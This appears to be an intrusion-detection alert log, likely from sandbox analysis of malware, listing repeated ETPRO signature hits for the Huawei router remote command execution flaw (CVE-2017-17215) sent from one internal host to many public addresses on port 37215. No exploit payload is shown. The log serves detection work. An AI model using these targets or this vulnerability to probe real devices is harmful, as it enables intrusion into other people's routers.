                                                    07/10/24-08:27:32.517419TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155037215192.168.2.1441.92.63.203
                                                    07/10/24-08:26:49.802589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5368237215192.168.2.1441.49.93.8
                                                    07/10/24-08:26:33.233567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867837215192.168.2.14157.35.91.176
                                                    07/10/24-08:27:28.156575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4974437215192.168.2.14165.222.62.79
                                                    07/10/24-08:26:25.432344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478237215192.168.2.14197.173.45.149
                                                    07/10/24-08:26:52.092342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862637215192.168.2.1441.211.117.232
                                                    07/10/24-08:27:19.285425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3407037215192.168.2.1441.157.45.123
                                                    07/10/24-08:27:33.743341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6099037215192.168.2.1441.191.56.188
                                                    07/10/24-08:27:33.897517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534237215192.168.2.14197.224.13.97
                                                    07/10/24-08:27:13.879293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6081037215192.168.2.14197.96.210.39
                                                    07/10/24-08:26:38.636567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445237215192.168.2.1441.122.244.191
                                                    07/10/24-08:26:13.828351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3866637215192.168.2.14197.207.60.35
                                                    07/10/24-08:27:22.926905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4449637215192.168.2.14197.211.227.169
                                                    07/10/24-08:27:07.264352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3429637215192.168.2.1441.226.215.97
                                                    07/10/24-08:27:11.534381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341637215192.168.2.14197.61.125.135
                                                    07/10/24-08:26:31.095355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378037215192.168.2.1412.11.255.68
                                                    07/10/24-08:27:08.353960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5587637215192.168.2.1425.58.41.92
                                                    07/10/24-08:26:15.875738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370837215192.168.2.14157.55.127.70
                                                    07/10/24-08:26:49.858364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148437215192.168.2.14157.226.202.107
                                                    07/10/24-08:27:14.867068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6056837215192.168.2.14197.176.16.117
                                                    07/10/24-08:26:33.175364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577037215192.168.2.1441.44.32.165
                                                    07/10/24-08:26:14.720259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732037215192.168.2.14197.193.192.133
                                                    07/10/24-08:26:14.771626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5194637215192.168.2.1441.96.189.227
                                                    07/10/24-08:26:38.524436TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5195037215192.168.2.1470.32.202.129
                                                    07/10/24-08:26:13.748733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4316637215192.168.2.1441.27.160.130
                                                    07/10/24-08:26:33.255406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4207637215192.168.2.14197.64.230.35
                                                    07/10/24-08:26:59.667769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5003837215192.168.2.1431.189.158.150
                                                    07/10/24-08:26:38.630697TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3325637215192.168.2.1473.200.49.191
                                                    07/10/24-08:26:55.366131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4268037215192.168.2.1441.154.66.43
                                                    07/10/24-08:26:59.848690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4851037215192.168.2.14157.198.168.86
                                                    07/10/24-08:26:13.835894TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3519437215192.168.2.1441.188.57.140
                                                    07/10/24-08:26:42.447281TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108437215192.168.2.14139.154.40.185
                                                    07/10/24-08:27:13.983145TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721637215192.168.2.14157.213.181.177
                                                    07/10/24-08:26:28.791726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5291437215192.168.2.14157.234.227.89
                                                    07/10/24-08:26:11.659396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379437215192.168.2.1441.197.240.187
                                                    07/10/24-08:26:59.539411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3304437215192.168.2.14146.63.146.126
                                                    07/10/24-08:27:30.556731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026237215192.168.2.1441.244.24.133
                                                    07/10/24-08:26:41.615141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351637215192.168.2.1491.191.185.152
                                                    07/10/24-08:27:33.828822TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5702637215192.168.2.1467.167.180.22
                                                    07/10/24-08:27:13.955612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734237215192.168.2.1441.193.139.210
                                                    07/10/24-08:26:15.872361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930237215192.168.2.14223.21.243.90
                                                    07/10/24-08:26:20.152800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3372037215192.168.2.14157.202.12.31
                                                    07/10/24-08:26:26.574545TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892437215192.168.2.1441.190.215.164
                                                    07/10/24-08:26:36.376968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123837215192.168.2.14157.68.81.25
                                                    07/10/24-08:26:57.528715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3289037215192.168.2.14157.113.184.21
                                                    07/10/24-08:27:10.561915TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4609837215192.168.2.1490.230.108.112
                                                    07/10/24-08:26:20.168869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5678637215192.168.2.1441.42.29.191
                                                    07/10/24-08:26:11.617783TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317037215192.168.2.14197.159.41.215
                                                    07/10/24-08:27:28.064237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920237215192.168.2.14197.103.186.178
                                                    07/10/24-08:26:47.951146TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4086437215192.168.2.1441.1.182.122
                                                    07/10/24-08:26:15.828083TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5380837215192.168.2.14197.44.89.111
                                                    07/10/24-08:26:28.906271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985837215192.168.2.1441.103.140.223
                                                    07/10/24-08:27:05.160088TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3755437215192.168.2.1463.183.97.175
                                                    07/10/24-08:26:57.666585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5031237215192.168.2.14157.250.148.177
                                                    07/10/24-08:26:28.842346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4401437215192.168.2.14157.43.165.200
                                                    07/10/24-08:26:57.641375TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4888237215192.168.2.14157.44.47.169
                                                    07/10/24-08:26:55.454904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475637215192.168.2.1441.193.12.185
                                                    07/10/24-08:26:41.529944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5980037215192.168.2.14152.154.249.67
                                                    07/10/24-08:26:14.811319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5671237215192.168.2.14197.247.241.224
                                                    07/10/24-08:26:28.746677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4095037215192.168.2.1441.244.26.64
                                                    07/10/24-08:27:23.909366TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4081037215192.168.2.1441.222.164.87
                                                    07/10/24-08:26:49.755062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3330437215192.168.2.14197.180.37.168
                                                    07/10/24-08:26:17.941033TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746837215192.168.2.14157.125.241.24
                                                    07/10/24-08:27:33.915433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5451237215192.168.2.14197.194.14.157
                                                    07/10/24-08:26:33.247201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5493437215192.168.2.14197.4.41.65
                                                    07/10/24-08:27:23.931354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4949437215192.168.2.14157.173.235.80
                                                    07/10/24-08:26:20.148665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309237215192.168.2.1441.173.170.11
                                                    07/10/24-08:26:41.609298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581237215192.168.2.14197.240.2.164
                                                    07/10/24-08:27:13.815715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003637215192.168.2.14157.245.203.199
                                                    07/10/24-08:27:17.074634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3692237215192.168.2.14138.119.35.84
                                                    07/10/24-08:26:55.380846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4747837215192.168.2.1441.69.55.231
                                                    07/10/24-08:27:02.949585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4119037215192.168.2.14157.103.101.157
                                                    07/10/24-08:26:33.208754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849237215192.168.2.14197.250.37.66
                                                    07/10/24-08:26:59.761558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5523837215192.168.2.14197.83.219.155
                                                    07/10/24-08:26:59.618688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514237215192.168.2.14197.125.95.219
                                                    07/10/24-08:27:22.791889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3282437215192.168.2.1498.50.79.81
                                                    07/10/24-08:27:08.439576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089637215192.168.2.14157.197.97.197
                                                    07/10/24-08:27:14.803145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282637215192.168.2.14197.64.84.218
                                                    07/10/24-08:26:52.054168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4400037215192.168.2.14157.22.189.188
                                                    07/10/24-08:26:38.638682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574037215192.168.2.14157.28.38.133
                                                    07/10/24-08:26:20.183913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5972637215192.168.2.14197.97.197.227
                                                    07/10/24-08:26:53.202561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4782237215192.168.2.14157.3.246.224
                                                    07/10/24-08:26:59.630762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5608837215192.168.2.14166.82.62.198
                                                    07/10/24-08:27:23.965193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4264837215192.168.2.14173.232.35.1
                                                    07/10/24-08:27:30.514704TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4148837215192.168.2.1418.68.158.79
                                                    07/10/24-08:27:32.614606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615637215192.168.2.1441.118.46.173
                                                    07/10/24-08:26:42.455188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382437215192.168.2.14197.74.244.113
                                                    07/10/24-08:26:48.007312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6002637215192.168.2.14157.25.107.251
                                                    07/10/24-08:27:20.418870TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4923637215192.168.2.14157.206.30.28
                                                    07/10/24-08:26:43.906584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5841437215192.168.2.14197.19.54.153
                                                    07/10/24-08:26:22.285937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5251237215192.168.2.14157.18.67.186
                                                    07/10/24-08:27:27.037222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434037215192.168.2.14197.8.59.194
                                                    07/10/24-08:26:47.964630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5043837215192.168.2.14197.216.1.43
                                                    07/10/24-08:27:02.767297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5849437215192.168.2.1441.177.14.45
                                                    07/10/24-08:27:16.998730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5807237215192.168.2.14197.245.157.42
                                                    07/10/24-08:26:47.900584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4451237215192.168.2.1432.146.85.200
                                                    07/10/24-08:26:57.650241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5576237215192.168.2.14197.153.41.22
                                                    07/10/24-08:26:31.055079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837237215192.168.2.14220.130.138.80
                                                    07/10/24-08:26:34.246855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751837215192.168.2.1441.47.221.145
                                                    07/10/24-08:26:59.620881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5819237215192.168.2.14197.143.71.227
                                                    07/10/24-08:27:11.564208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614237215192.168.2.14197.15.172.175
                                                    07/10/24-08:27:27.058852TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.1441.10.168.178
                                                    07/10/24-08:27:19.324318TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121837215192.168.2.1441.9.188.238
                                                    07/10/24-08:26:42.370410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018637215192.168.2.1441.8.77.60
                                                    07/10/24-08:26:28.758809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4301637215192.168.2.1457.139.180.199
                                                    07/10/24-08:26:13.663247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079237215192.168.2.14179.100.17.30
                                                    07/10/24-08:27:05.205461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5083237215192.168.2.14135.61.246.233
                                                    07/10/24-08:27:08.448346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136837215192.168.2.14192.27.240.157
                                                    07/10/24-08:26:43.928698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5157837215192.168.2.14183.192.93.193
                                                    07/10/24-08:26:14.804179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599237215192.168.2.1441.83.128.65
                                                    07/10/24-08:26:57.667914TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3278237215192.168.2.14157.24.154.214
                                                    07/10/24-08:26:41.350291TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5750837215192.168.2.1441.212.43.127
                                                    07/10/24-08:26:47.869389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5109837215192.168.2.1441.28.146.194
                                                    07/10/24-08:27:14.847591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369037215192.168.2.14188.40.64.178
                                                    07/10/24-08:26:13.768963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4915637215192.168.2.14157.101.32.85
                                                    07/10/24-08:27:19.327532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739837215192.168.2.14130.47.163.75
                                                    07/10/24-08:26:25.483739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730837215192.168.2.14157.60.83.229
                                                    07/10/24-08:27:24.880000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851237215192.168.2.1441.159.192.237
                                                    07/10/24-08:26:38.552864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3360237215192.168.2.1462.31.57.238
                                                    07/10/24-08:27:11.537830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287037215192.168.2.14197.170.197.156
                                                    07/10/24-08:26:22.290306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669837215192.168.2.14157.216.178.0
                                                    07/10/24-08:26:43.554378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683237215192.168.2.14157.184.194.84
                                                    07/10/24-08:27:33.956597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4149237215192.168.2.1461.168.234.220
                                                    07/10/24-08:26:17.972385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3716237215192.168.2.14197.22.193.65
                                                    07/10/24-08:27:22.910234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4688437215192.168.2.1441.204.124.253
                                                    07/10/24-08:27:24.926927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373437215192.168.2.14141.192.128.74
                                                    07/10/24-08:26:36.334261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806037215192.168.2.14157.221.95.75
                                                    07/10/24-08:27:05.121645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4462037215192.168.2.14157.154.196.89
                                                    07/10/24-08:27:13.815715TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4373837215192.168.2.14157.1.231.177
                                                    07/10/24-08:27:17.026223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929237215192.168.2.14197.7.149.32
                                                    07/10/24-08:27:05.198256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915237215192.168.2.14184.89.134.209
                                                    07/10/24-08:26:25.485582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5644437215192.168.2.1441.148.122.219
                                                    07/10/24-08:26:36.431217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826637215192.168.2.14197.149.15.97
                                                    07/10/24-08:26:45.583346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5629837215192.168.2.14197.64.136.16
                                                    07/10/24-08:26:52.015024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3992037215192.168.2.1441.15.41.189
                                                    07/10/24-08:26:45.655197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4592437215192.168.2.14157.17.200.30
                                                    07/10/24-08:27:14.878882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542037215192.168.2.1413.105.59.13
                                                    07/10/24-08:27:33.866753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684637215192.168.2.14162.176.173.9
                                                    07/10/24-08:26:14.622607TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764037215192.168.2.1441.180.237.246
                                                    07/10/24-08:27:07.376838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4402837215192.168.2.1441.37.225.97
                                                    07/10/24-08:26:47.860875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4623837215192.168.2.1441.252.124.245
                                                    07/10/24-08:27:22.906366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5050237215192.168.2.14157.82.33.28
                                                    07/10/24-08:26:34.233707TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4292437215192.168.2.14157.52.34.207
                                                    07/10/24-08:27:05.154220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486037215192.168.2.1439.124.207.9
                                                    07/10/24-08:27:19.157355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3724837215192.168.2.1457.147.240.165
                                                    07/10/24-08:26:33.257130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5928637215192.168.2.14157.219.73.203
                                                    07/10/24-08:26:11.524007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5658837215192.168.2.1473.111.130.134
                                                    07/10/24-08:26:26.589682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5520037215192.168.2.14157.126.229.236
                                                    07/10/24-08:26:53.114397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4671837215192.168.2.14197.248.182.182
                                                    07/10/24-08:27:19.163941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590237215192.168.2.1419.118.93.137
                                                    07/10/24-08:26:49.897111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5588237215192.168.2.14142.101.216.252
                                                    07/10/24-08:26:36.431217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958637215192.168.2.14157.44.209.94
                                                    07/10/24-08:26:48.012931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5401837215192.168.2.1441.77.114.124
                                                    07/10/24-08:26:53.186613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286637215192.168.2.1499.151.123.244
                                                    07/10/24-08:26:31.048424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002637215192.168.2.1441.64.244.92
                                                    07/10/24-08:27:24.920264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5829237215192.168.2.1441.67.41.9
                                                    07/10/24-08:26:47.789703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615037215192.168.2.14197.153.219.253
                                                    07/10/24-08:26:59.783128TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310437215192.168.2.14157.240.40.9
                                                    07/10/24-08:26:29.790655TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5074437215192.168.2.1481.116.244.252
                                                    07/10/24-08:27:31.526577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4069037215192.168.2.1441.252.74.163
                                                    07/10/24-08:27:33.970965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934637215192.168.2.1441.131.235.175
                                                    07/10/24-08:26:59.598591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5598637215192.168.2.1419.90.42.13
                                                    07/10/24-08:27:33.773632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432637215192.168.2.14157.247.202.9
                                                    07/10/24-08:26:15.827903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256037215192.168.2.1450.26.176.42
                                                    07/10/24-08:26:36.330263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944837215192.168.2.14197.36.13.31
                                                    07/10/24-08:26:38.577437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085437215192.168.2.14157.221.217.59
                                                    07/10/24-08:27:13.822075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5375637215192.168.2.14197.91.97.94
                                                    07/10/24-08:27:11.547774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013637215192.168.2.14197.207.158.91
                                                    07/10/24-08:26:18.006085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6061637215192.168.2.1436.153.122.47
                                                    07/10/24-08:27:23.969981TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3322837215192.168.2.14155.55.220.68
                                                    07/10/24-08:26:26.437394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4442637215192.168.2.14197.186.115.56
                                                    07/10/24-08:26:20.152371TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430037215192.168.2.1441.77.117.86
                                                    07/10/24-08:27:03.035788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4397437215192.168.2.14197.168.160.241
                                                    07/10/24-08:27:36.280780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571637215192.168.2.14150.90.67.77
                                                    07/10/24-08:26:25.495020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398637215192.168.2.141.57.14.117
                                                    07/10/24-08:26:59.661983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5735237215192.168.2.14157.74.147.234
                                                    07/10/24-08:27:27.036328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5372837215192.168.2.1441.114.235.247
                                                    07/10/24-08:27:28.165302TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5718037215192.168.2.14219.36.91.201
                                                    07/10/24-08:26:59.714271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3948037215192.168.2.14197.70.61.31
                                                    07/10/24-08:27:13.884965TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056637215192.168.2.1441.113.211.121
                                                    07/10/24-08:27:23.905931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639637215192.168.2.1441.145.146.237
                                                    07/10/24-08:26:52.064217TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3878037215192.168.2.14157.174.108.165
                                                    07/10/24-08:26:52.075080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5958637215192.168.2.1441.197.23.200
                                                    07/10/24-08:26:33.266829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5469237215192.168.2.14157.1.24.121
                                                    07/10/24-08:27:22.922024TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3367837215192.168.2.14141.111.16.79
                                                    07/10/24-08:27:31.561854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302837215192.168.2.14157.17.63.122
